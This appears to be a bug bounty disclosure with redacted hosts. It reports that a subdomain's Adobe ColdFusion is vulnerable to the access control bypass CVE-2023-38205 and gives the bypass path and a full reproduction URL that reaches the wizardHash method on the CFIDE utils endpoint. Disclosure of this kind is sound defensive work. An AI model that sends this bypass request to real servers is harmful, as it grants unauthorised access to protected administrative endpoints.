Adobe ColdFusion Access Control Bypass - CVE-2023-38205

**Description:** Hi team, The subdomain https://████ is with adobe ColdFusion vulnerable with CVE-2023-38205. This vulnerability is a bypass path created for CVE-2023-29298. ## References https://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/ ## Impact If an attacker accesses a URL path of /hax/..CFIDE/wizards/common/utils.cfc the access control can be bypassed and the expected endpoint can still be reached, even though it is not a valid URL path . ## System Host(s) █████████ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2023-38205 ## Steps to Reproduce 1. Go to: https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx 2. See the remote method call wizardHash on the/CFIDE/wizards/common/utils.cfc endpoint. ## Suggested Mitigation/Remediation Actions